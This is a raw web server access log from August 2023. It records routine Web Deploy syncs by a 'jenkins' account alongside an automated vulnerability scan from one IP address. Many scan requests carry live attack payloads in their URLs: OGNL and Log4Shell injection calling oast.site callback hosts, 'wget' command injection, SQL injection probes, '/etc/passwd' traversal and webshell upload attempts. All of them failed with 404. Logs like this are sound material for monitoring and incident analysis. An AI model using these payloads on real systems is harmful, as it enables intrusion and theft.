2023-08-04 04:24:45 103.153.214.94 HEAD /msdeploy.axd Site=qlk.qfoody.vn 8172 - 119.82.130.75 - - 401 2 5 16
2023-08-04 04:24:45 103.153.214.94 HEAD /msdeploy.axd Site=qlk.qfoody.vn 8172 jenkins 119.82.130.75 - - 200 0 0 32
2023-08-04 04:24:45 103.153.214.94 HEAD /msdeploy.axd Site=qlk.qfoody.vn 8172 jenkins 119.82.130.75 - - 200 0 0 19
2023-08-04 04:24:45 103.153.214.94 POST /msdeploy.axd Site=qlk.qfoody.vn 8172 jenkins 119.82.130.75 MSDeployExe;sid=e1c598f4-6ee0-4070-a372-27b1d7fceabf;op=Sync - 200 0 0 330
2023-08-04 04:24:45 103.153.214.94 POST /msdeploy.axd Site=qlk.qfoody.vn 8172 jenkins 119.82.130.75 - - 200 0 0 390
2023-08-04 04:24:45 103.153.214.94 HEAD /msdeploy.axd Site=qlk.qfoody.vn 8172 jenkins 119.82.130.75 - - 200 0 0 12
2023-08-04 04:25:48 103.153.214.94 POST /msdeploy.axd Site=qlk.qfoody.vn 8172 jenkins 119.82.130.75 MSDeployExe;sid=e1c598f4-6ee0-4070-a372-27b1d7fceabf;op=Sync - 200 0 0 62294
2023-08-04 04:25:48 103.153.214.94 POST /msdeploy.axd Site=qlk.qfoody.vn 8172 jenkins 119.82.130.75 - - 200 0 0 62339
2023-08-04 04:26:37 103.153.214.94 GET /${(#a=@org.apache.commons.io.IOUtils@toString(@java.lang.Runtime@getRuntime().exec("whoami").getInputStream(),"utf-8")).(@com.opensymphony.webwork.ServletActionContext@getResponse().setHeader("X-Cmd-Response",#a))}/ - 8172 - 111.90.143.37 Mozilla/5.0+(Windows+NT+5.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/34.0.1866.237+Safari/537.36 - 404 7 0 77
2023-08-04 04:26:44 103.153.214.94 GET /${@java.lang.Runtime@getRuntime().exec("nslookup+cj5gsq24749fn87ofdl0n8z4xns58dfdt.oast.site")}/ - 8172 - 111.90.143.37 Mozilla/5.0+(X11;+Ubuntu;+Linux+x86_64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/55.0.2919.83+Safari/537.36 - 404 7 0 61
2023-08-04 04:29:01 103.153.214.94 GET /index.php c=api&m=data2&auth=582f27d140497a9d8f048ca085b111df¶m=action=sql%20sql=%27select%20md5(999999999)%27 8172 - 111.90.143.37 Mozilla/5.0+(Windows+NT+5.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/36.0.1985.67+Safari/537.36 - 404 7 0 56
2023-08-04 04:31:08 103.153.214.94 POST /wp-admin/admin-ajax.php action=action_name 8172 - 111.90.143.37 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/89.0.4389.114+Safari/537.36 - 404 7 0 68
2023-08-04 04:32:53 103.153.214.94 POST /soap.cgi service=whatever-control;curl 8172 - 111.90.143.37 Mozilla/5.0+(X11;+OpenBSD+i386)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/36.0.1985.125+Safari/537.36 - 404 7 0 389
2023-08-04 04:35:40 103.153.214.94 GET /getFavicon host=http://oast.fun/ 8172 - 111.90.143.37 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_8_4)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/49.0.2656.18+Safari/537.36 - 404 7 0 81
2023-08-04 04:41:16 103.153.214.94 GET /cgi-bin-hax/ExportSettings.sh - 8172 - 111.90.143.37 Mozilla/5.0+(Windows+NT+6.1;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2227.0+Safari/537.36 - 404 7 0 81
2023-08-04 04:43:17 103.153.214.94 GET /.tugboat - 8172 - 111.90.143.37 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_8_4)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/49.0.2656.18+Safari/537.36 - 404 7 0 81
2023-08-04 04:45:00 103.153.214.94 POST /debug.php - 8172 - 111.90.143.37 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_9_2)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/36.0.1944.0+Safari/537.36 - 404 7 0 86
2023-08-04 04:47:00 103.153.214.94 POST /EemAdminService/EemAdmin - 8172 - 111.90.143.37 Mozilla/5.0+(Windows+NT+6.3;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2225.0+Safari/537.36 - 404 7 0 84
2023-08-04 04:53:53 103.153.214.94 GET /v1/folder path=%2F 8172 - 111.90.143.37 Mozilla/5.0+(Windows+NT+6.3;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2225.0+Safari/537.36 - 404 7 0 64
2023-08-04 04:56:09 103.153.214.94 POST /wp-comments-post.php - 8172 - 111.90.143.37 Mozilla/5.0+(Windows+NT+6.1;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/36.0.1985.67+Safari/537.36 - 404 7 0 81
2023-08-04 04:56:16 103.153.214.94 GET /wp-content/plugins/imagements/images/2tsgvnqssytfckb12pvzsszcdcl.php - 8172 - 111.90.143.37 Mozilla/5.0+(Windows+NT+6.4;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2225.0+Safari/537.36 - 404 7 0 55
2023-08-04 04:58:18 103.153.214.94 GET / - 8172 - 111.90.143.37 Mozilla/5.0+(X11;+Linux+x86_64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/34.0.1847.137+Safari/4E423F - 404 7 0 79
2023-08-04 05:05:44 103.153.214.94 POST /userportal/Controller mode=8700&operation=1&datagrid=179&json={"%f0%9f%a6%9e":"test"} 8172 - 111.90.143.37 Mozilla/5.0+(X11;+Linux+x86_64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/34.0.1847.137+Safari/4E423F - 404 7 0 85
2023-08-04 05:06:58 103.153.214.94 POST /actuator/gateway/routes/2TSGVDaASHvHGLiEA1JTYG2TDWB - 8172 - 111.90.143.37 Mozilla/5.0+(Windows+NT+6.1;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/36.0.1985.67+Safari/537.36 - 404 7 0 77
2023-08-04 05:07:06 103.153.214.94 POST /actuator/gateway/refresh - 8172 - 111.90.143.37 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_9_2)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/36.0.1944.0+Safari/537.36 - 404 7 0 64
2023-08-04 05:07:14 103.153.214.94 DELETE /actuator/gateway/routes/2TSGVDaASHvHGLiEA1JTYG2TDWB - 8172 - 111.90.143.37 Mozilla/5.0+(X11;+OpenBSD+i386)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/36.0.1985.125+Safari/537.36 - 404 7 0 77
2023-08-04 05:10:57 103.153.214.94 PUT /v1/agent/service/register - 8172 - 111.90.143.37 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_9_3)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/35.0.1916.47+Safari/537.36 - 404 7 0 87
2023-08-04 05:16:57 103.153.214.94 POST /directdata/direct/router - 8172 - 111.90.143.37 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_9_3)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/35.0.1916.47+Safari/537.36 - 404 7 0 60
2023-08-04 05:17:05 103.153.214.94 GET /2TSGV5S4touiJt3iNyT2VPVCwKG.txt - 8172 - 111.90.143.37 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_8_4)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/49.0.2656.18+Safari/537.36 - 404 7 0 70
2023-08-04 05:18:13 103.153.214.94 POST /console/css/%2e%2e%2fconsole.portal - 8172 - 111.90.143.37 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_9_2)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/36.0.1944.0+Safari/537.36 - 400 0 0 92
2023-08-04 05:18:53 103.153.214.94 GET /plus/recommend.php action&aid=1&_FILES[type][tmp_name]=\%27%20or%20mid=@`\%27`%20/*!50000union*//*!50000select*/1,2,3,md5(999999999),5,6,7,8,9%23@`\%27`+&_FILES[type][name]=1.jpg&_FILES[type][type]=application/octet-stream&_FILES[type][size]=4294 8172 - 111.90.143.37 Mozilla/5.0+(Windows+NT+6.3;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2226.0+Safari/537.36 - 404 7 0 59
2023-08-04 05:23:39 103.153.214.94 GET /wan.htm - 8172 - 111.90.143.37 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_9_2)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/36.0.1944.0+Safari/537.36 - 404 7 0 70
2023-08-04 05:28:35 103.153.214.94 POST /wp-admin/admin-ajax.php - 8172 - 111.90.143.37 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_8_3)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/54.0.2866.71+Safari/537.36 - 404 7 0 56
2023-08-04 05:31:25 103.153.214.94 GET /cgi-bin/touchlist_sync.cgi IP=;wget+http://cj5gsq24749fn87ofdl0zai6z6wiw51fq.oast.site; 8172 - 111.90.143.37 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_9_3)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/35.0.1916.47+Safari/537.36 - 404 7 0 46
2023-08-04 05:35:11 103.153.214.94 GET /upload/mobile/index.php c=category&a=asynclist&price_max=1.0%20AND%20(SELECT%201%20FROM(SELECT%20COUNT(*),CONCAT(0x7e,md5(999999999),0x7e,FLOOR(RAND(0)*2))x%20FROM%20INFORMATION_SCHEMA.CHARACTER_SETS%20GROUP%20BY%20x)a)'' 8172 - 111.90.143.37 Mozilla/5.0+(Windows+NT+10.0)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/89.0.4389.114+Safari/537.36 - 404 7 0 46
2023-08-04 05:38:03 103.153.214.94 GET / - 8172 - 111.90.143.37 Mozilla/5.0+(X11;+Linux+x86_64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/34.0.1847.137+Safari/4E423F - 404 7 0 49
2023-08-04 05:38:31 103.153.214.94 POST /api/login - 8172 - 111.90.143.37 Mozilla/5.0+(Windows+NT+6.4;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2225.0+Safari/537.36 https://bcvt.kontum.gov.vn:8172/manage/account/login?redirect=%2Fmanage 404 7 0 54
2023-08-04 05:40:50 103.153.214.94 GET /index.php option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml(0x23,concat(1,md5(999999999)),1) 8172 - 111.90.143.37 Mozilla/5.0+(Windows+NT+6.1;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/36.0.1985.67+Safari/537.36 - 404 7 0 45
2023-08-04 05:43:51 103.153.214.94 POST /wp-admin/admin-ajax.php - 8172 - 111.90.143.37 Mozilla/5.0+(Windows+NT+10.0;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/89.0.4389.114+Safari/537.36 - 404 7 0 90
2023-08-04 05:52:03 103.153.214.94 GET /upload/setup/install.php - 8172 - 111.90.143.37 Mozilla/5.0+(X11;+Linux+x86_64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2227.0+Safari/537.36 - 404 7 0 45
2023-08-04 05:52:13 103.153.214.94 GET /setup/install.php - 8172 - 111.90.143.37 Mozilla/5.0+(Windows+NT+6.1;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/36.0.1985.67+Safari/537.36 - 404 7 0 61
2023-08-04 05:57:20 103.153.214.94 GET /elFinder/php/connector.minimal.php cmd=mkfile&target=l1_Lw&name=2TSGVScUCFXFpSniRqhOX2KiDd5.php:aaa 8172 - 111.90.143.37 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_9_2)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/52.0.2762.73+Safari/537.36 - 404 7 0 49
2023-08-04 05:58:08 103.153.214.94 GET /fw.login.php apikey=%27UNION%20select%201,%27YToyOntzOjM6InVpZCI7czo0OiItMTAwIjtzOjIyOiJBQ1RJVkVfRElSRUNUT1JZX0lOREVYIjtzOjE6IjEiO30=%27; 8172 - 111.90.143.37 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_10_1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/37.0.2062.124+Safari/537.36 - 404 7 0 55
2023-08-04 06:04:49 103.153.214.94 GET /zp-core/setup/index.php - 8172 - 111.90.143.37 Mozilla/5.0+(Windows+NT+10.0)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/40.0.2214.93+Safari/537.36 - 404 7 0 48
2023-08-04 06:04:57 103.153.214.94 GET /zp/zp-core/setup/index.php - 8172 - 111.90.143.37 Mozilla/5.0+(Windows+NT+6.1;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/36.0.1985.67+Safari/537.36 - 404 7 0 50
2023-08-04 06:05:05 103.153.214.94 GET /gallery/zp-core/setup/index.php - 8172 - 111.90.143.37 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/89.0.4389.114+Safari/537.36 - 404 7 0 44
2023-08-04 06:05:13 103.153.214.94 GET /zenphoto/zp-core/setup/index.php - 8172 - 111.90.143.37 Mozilla/5.0+(Windows+NT+5.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/35.0.2117.157+Safari/537.36 - 404 7 0 43
2023-08-04 06:06:30 103.153.214.94 POST /cgi-bin/libagent.cgi type=J 8172 - 111.90.143.37 Mozilla/5.0+(Windows+NT+6.4;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2225.0+Safari/537.36 - 404 7 0 43
2023-08-04 06:11:31 103.153.214.94 GET /wp-content/plugins/fancy-product-designer/inc/custom-image-handler.php - 8172 - 111.90.143.37 Mozilla/5.0+(Windows+NT+6.1;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/36.0.1985.67+Safari/537.36 - 404 7 0 42
2023-08-04 06:16:56 103.153.214.94 POST /conf_mail.php - 8172 - 111.90.143.37 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_9_2)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/52.0.2762.73+Safari/537.36 - 404 7 0 50
2023-08-04 06:17:27 103.153.214.94 GET / - 8172 - 111.90.143.37 Mozilla/5.0+(Windows+NT+6.3;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2225.0+Safari/537.36 - 404 7 0 40
2023-08-04 06:19:46 103.153.214.94 POST /ws/v1/cluster/apps/new-application - 8172 - 111.90.143.37 Mozilla/5.0+(Windows+NT+4.0;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/37.0.2049.0+Safari/537.36 - 404 7 0 310
2023-08-04 06:20:20 103.153.214.94 HEAD /msdeploy.axd Site=qlk.qfoody.vn 8172 - 119.82.130.75 - - 401 2 5 12
2023-08-04 06:20:20 103.153.214.94 HEAD /msdeploy.axd Site=qlk.qfoody.vn 8172 jenkins 119.82.130.75 - - 200 0 0 22
2023-08-04 06:20:20 103.153.214.94 HEAD /msdeploy.axd Site=qlk.qfoody.vn 8172 jenkins 119.82.130.75 - - 200 0 0 20
2023-08-04 06:20:20 103.153.214.94 POST /msdeploy.axd Site=qlk.qfoody.vn 8172 jenkins 119.82.130.75 MSDeployExe;sid=01f1b699-c762-4398-9f07-1a5a5d48b97e;op=Sync - 200 0 0 294
2023-08-04 06:20:20 103.153.214.94 POST /msdeploy.axd Site=qlk.qfoody.vn 8172 jenkins 119.82.130.75 - - 200 0 0 350
2023-08-04 06:20:20 103.153.214.94 HEAD /msdeploy.axd Site=qlk.qfoody.vn 8172 jenkins 119.82.130.75 - - 200 0 0 9
2023-08-04 06:21:22 103.153.214.94 POST /msdeploy.axd Site=qlk.qfoody.vn 8172 jenkins 119.82.130.75 - - 200 0 0 61935
2023-08-04 06:21:22 103.153.214.94 POST /msdeploy.axd Site=qlk.qfoody.vn 8172 jenkins 119.82.130.75 MSDeployExe;sid=01f1b699-c762-4398-9f07-1a5a5d48b97e;op=Sync - 200 0 0 61907
2023-08-04 06:24:47 103.153.214.94 HEAD /msdeploy.axd Site=qlk.qfoody.vn 8172 - 119.82.130.75 - - 401 2 5 17
2023-08-04 06:24:47 103.153.214.94 HEAD /msdeploy.axd Site=qlk.qfoody.vn 8172 jenkins 119.82.130.75 - - 200 0 0 26
2023-08-04 06:24:47 103.153.214.94 HEAD /msdeploy.axd Site=qlk.qfoody.vn 8172 jenkins 119.82.130.75 - - 200 0 0 74
2023-08-04 06:24:47 103.153.214.94 POST /msdeploy.axd Site=qlk.qfoody.vn 8172 jenkins 119.82.130.75 MSDeployExe;sid=d595c5a6-c282-4426-8f32-e326c140fb16;op=Sync - 200 0 0 278
2023-08-04 06:24:47 103.153.214.94 POST /msdeploy.axd Site=qlk.qfoody.vn 8172 jenkins 119.82.130.75 - - 200 0 0 392
2023-08-04 06:24:47 103.153.214.94 HEAD /msdeploy.axd Site=qlk.qfoody.vn 8172 jenkins 119.82.130.75 - - 200 0 0 8
2023-08-04 06:25:50 103.153.214.94 POST /msdeploy.axd Site=qlk.qfoody.vn 8172 jenkins 119.82.130.75 MSDeployExe;sid=d595c5a6-c282-4426-8f32-e326c140fb16;op=Sync - 200 0 0 62593
2023-08-04 06:25:50 103.153.214.94 POST /msdeploy.axd Site=qlk.qfoody.vn 8172 jenkins 119.82.130.75 - - 200 0 0 62616
2023-08-04 06:29:24 103.153.214.94 GET /login - 8172 - 111.90.143.37 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_9_2)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/36.0.1944.0+Safari/537.36 - 404 7 0 55
2023-08-04 06:29:30 103.153.214.94 POST /Collector/diagnostics/ping - 8172 - 111.90.143.37 Mozilla/5.0+(Windows+NT+5.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/35.0.3319.102+Safari/537.36 - 404 7 0 58
2023-08-04 06:29:37 103.153.214.94 GET /WidgetHandler.ashx MethodName=Sort&ID=1&row=1&column=%28SELECT%20CONCAT%28CONCAT%28CHAR%28126%29%2C%28SELECT%20SUBSTRING%28%28ISNULL%28CAST%28db_name%28%29%20AS%20NVARCHAR%284000%29%29%2CCHAR%2832%29%29%29%2C1%2C1024%29%29%29%2CCHAR%28126%29%29%29 8172 - 111.90.143.37 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_8_3)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/54.0.2866.71+Safari/537.36 - 404 7 0 308
2023-08-04 06:34:54 103.153.214.94 POST / - 8172 - 111.90.143.37 Mozilla/5.0+(Windows+NT+5.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/35.0.2117.157+Safari/537.36 https://bcvt.kontum.gov.vn:8172 404 7 0 49
2023-08-04 06:38:49 103.153.214.94 GET /seeyon/thirdpartyController.do.css/..;/ajax.do - 8172 - 111.90.143.37 Mozilla/5.0+(Windows+NT+10.0)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/40.0.2214.93+Safari/537.36 - 404 5 0 42
2023-08-04 06:42:44 103.153.214.94 POST /ccms/index.php - 8172 - 111.90.143.37 Mozilla/5.0+(X11;+Linux+x86_64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2227.0+Safari/537.36 - 404 7 0 43
2023-08-04 06:42:51 103.153.214.94 GET /ccms/dashboard.php - 8172 - 111.90.143.37 Mozilla/5.0+(Windows+NT+6.4;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2225.0+Safari/537.36 - 404 7 0 39
2023-08-04 06:46:19 103.153.214.94 POST /servlets/OmaDsServlet - 8172 - 111.90.143.37 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_9_2)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/52.0.2762.73+Safari/537.36 - 404 7 0 52
2023-08-04 06:48:09 103.153.214.94 GET /wp-json/wp/v2/add-listing id=1 8172 - 111.90.143.37 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_9_3)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/35.0.1916.47+Safari/537.36 - 404 7 0 47
2023-08-04 06:48:13 103.153.214.94 GET /wp-admin/profile.php - 8172 - 111.90.143.37 Mozilla/5.0+(Windows+NT+6.4;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2225.0+Safari/537.36 - 404 7 0 69
2023-08-04 06:51:30 103.153.214.94 POST /CFIDE/adminapi/accessmanager.cfc method=foo&_cfclient=true 8172 - 111.90.143.37 Mozilla/5.0+(Windows+NT+5.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/36.0.1985.67+Safari/537.36 - 404 7 0 95
2023-08-04 06:54:03 103.153.214.94 GET /wp-content/plugins/wechat-broadcast/wechat/Image.php url=../../../../../../../../../../etc/passwd 8172 - 111.90.143.37 Mozilla/5.0+(Windows+NT+6.1;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/36.0.1985.67+Safari/537.36 - 404 7 0 87
2023-08-04 07:00:09 103.153.214.94 POST /Side.php - 8172 - 111.90.143.37 Mozilla/5.0+(Windows+NT+10.0;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/89.0.4389.114+Safari/537.36 - 404 7 0 53
2023-08-04 07:03:39 103.153.214.94 GET /assets/app/something/services/AppModule.class/ - 8172 - 111.90.143.37 Mozilla/5.0+(Windows+NT+5.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/36.0.1985.67+Safari/537.36 - 404 7 0 45
2023-08-04 07:06:07 103.153.214.94 GET /index.php m&c=AjaxPersonal&a=company_focus&company_id[0]=match&company_id[1][0]=test")+and+extractvalue(1,concat(0x7e,md5(999999999)))+--+a 8172 - 111.90.143.37 Mozilla/5.0+(Windows+NT+10.0;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/89.0.4389.114+Safari/537.36 - 404 7 0 52
2023-08-04 07:07:42 103.153.214.94 POST /wp-admin/admin-ajax.php action=moove_read_xml 8172 - 111.90.143.37 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_10_1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/37.0.2062.124+Safari/537.36 - 404 7 0 48
2023-08-04 07:12:25 103.153.214.94 GET /solr/admin/collections action=%24%7Bjndi%3Aldap%3A%2F%2F%24%7B%3A-887%7D%24%7B%3A-742}%7D.%24%7BhostName%7D.uri.cj5gsq24749fn87ofdl0of4k1p6fq3j1w.oast.site%2F%7D 8172 - 111.90.143.37 Mozilla/5.0+(Windows+NT+5.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2224.3+Safari/537.36 - 404 7 0 52
2023-08-04 07:12:33 103.153.214.94 GET /solr/admin/cores action=%24%7Bjndi%3Aldap%3A%2F%2F%24%7B%3A-887%7D%24%7B%3A-742}%7D.%24%7BhostName%7D.uri.cj5gsq24749fn87ofdl0g19gg8bw3w6jk.oast.site%2F%7D 8172 - 111.90.143.37 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_10_1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/37.0.2062.124+Safari/537.36 - 404 7 0 55
2023-08-04 07:13:43 103.153.214.94 GET /webGui/images/green-on.png/ path=x&site[x][text]=%3C?php%20echo%20md5(%22CVE-2020-5847%22);%20?%3E 8172 - 111.90.143.37 Mozilla/5.0+(Windows+NT+5.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/34.0.1866.237+Safari/537.36 - 404 7 0 46
2023-08-04 07:19:15 103.153.214.94 GET /ebook/bookPerPub.php pubid=4' 8172 - 111.90.143.37 Mozilla/5.0+(Windows+NT+5.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/34.0.1866.237+Safari/537.36 - 404 7 0 44
2023-08-04 07:21:02 103.153.214.94 POST /jeecg-boot/jmreport/show - 8172 - 111.90.143.37 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_8_4)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/49.0.2656.18+Safari/537.36 - 404 7 0 305
2023-08-04 07:21:29 103.153.214.94 GET /premise/front/getPingData url=http://0.0.0.0:9600/sm/api/v1/firewall/zone/services?zone=;/usr/bin/id; 8172 - 111.90.143.37 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_9_2)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/52.0.2762.73+Safari/537.36 - 404 7 0 81
2023-08-04 07:28:32 103.153.214.94 GET /api/geojson url=${jndi:ldap://${:-129}${:-319}.${hostName}.url.cj5gsq24749fn87ofdl0egmip58mk8h9x.oast.site} 8172 - 111.90.143.37 Mozilla/5.0+(Windows+NT+10.0)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/40.0.2214.93+Safari/537.36 - 404 7 0 46
2023-08-04 07:30:30 103.153.214.94 GET /level/16/exec/show/config/CR - 8172 - 111.90.143.37 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_8_3)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/54.0.2866.71+Safari/537.36 - 404 7 0 75
2023-08-04 07:31:58 103.153.214.94 GET /lab/api/settings/ - 8172 - 111.90.143.37 Mozilla/5.0+(Windows+NT+6.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2228.0+Safari/537.36 - 404 7 0 43
2023-08-04 07:33:58 103.153.214.94 GET /wp-content/plugins/chopslider/get_script/index.php id=1+AND+(SELECT+1+FROM+(SELECT(SLEEP(6)))A) 8172 - 111.90.143.37 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_8_4)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/49.0.2656.18+Safari/537.36 - 404 7 0 58
2023-08-04 07:35:20 103.153.214.94 POST /j_security_check - 8172 - 111.90.143.37 Mozilla/5.0+(Windows+NT+5.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/35.0.2309.372+Safari/537.36 https://bcvt.kontum.gov.vn:8172/user/login 404 7 0 61
2023-08-04 07:43:38 103.153.214.94 GET /cgi-bin/kerbynet Section=NoAuthREQ&Action=x509List&type=*%22;/root/kerbynet.cgi/scripts/getkey%20../../../etc/passwd;%22 8172 - 111.90.143.37 Mozilla/5.0+(Windows+NT+6.3;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/37.0.2049.0+Safari/537.36 - 404 7 0 47
2023-08-04 07:44:10 103.153.214.94 POST /wp-admin/admin-ajax.php - 8172 - 111.90.143.37 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_8_4)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/49.0.2656.18+Safari/537.36 - 404 7 0 40
2023-08-04 07:47:04 103.153.214.94 POST /wp-admin/options-general.php page=smartcode 8172 - 111.90.143.37 Mozilla/5.0+(Windows+NT+5.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/34.0.1866.237+Safari/537.36 - 404 7 0 56
2023-08-04 07:47:12 103.153.214.94 GET / - 8172 - 111.90.143.37 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_8_3)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/54.0.2866.71+Safari/537.36 - 404 7 0 45
2023-08-04 07:51:08 103.153.214.94 GET /zabbix/index_sso.php - 8172 - 111.90.143.37 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_10_1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2227.1+Safari/537.36 - 404 7 0 47
2023-08-04 07:51:16 103.153.214.94 GET /index_sso.php - 8172 - 111.90.143.37 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_10_1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2227.1+Safari/537.36 - 404 7 0 39
2023-08-04 07:52:17 103.153.214.94 POST /wp-admin/admin-ajax.php action=cfom_upload_file&name=2TSGVnRoeu9YxdiZrH8A7n0K0VR.pHp 8172 - 111.90.143.37 Mozilla/5.0+(Windows+NT+5.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2224.3+Safari/537.36 - 404 7 0 49
2023-08-04 07:52:22 103.153.214.94 GET /wp-content/uploads/cfom_files/2tsgvnroeu9yxdizrh8a7n0k0vr.php - 8172 - 111.90.143.37 Mozilla/5.0+(Windows+NT+5.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2224.3+Safari/537.36 - 404 7 0 49
2023-08-04 07:57:08 103.153.214.94 POST /index.php m=member&f=login_save 8172 - 111.90.143.37 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_9_2)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/52.0.2762.73+Safari/537.36 - 404 7 0 46
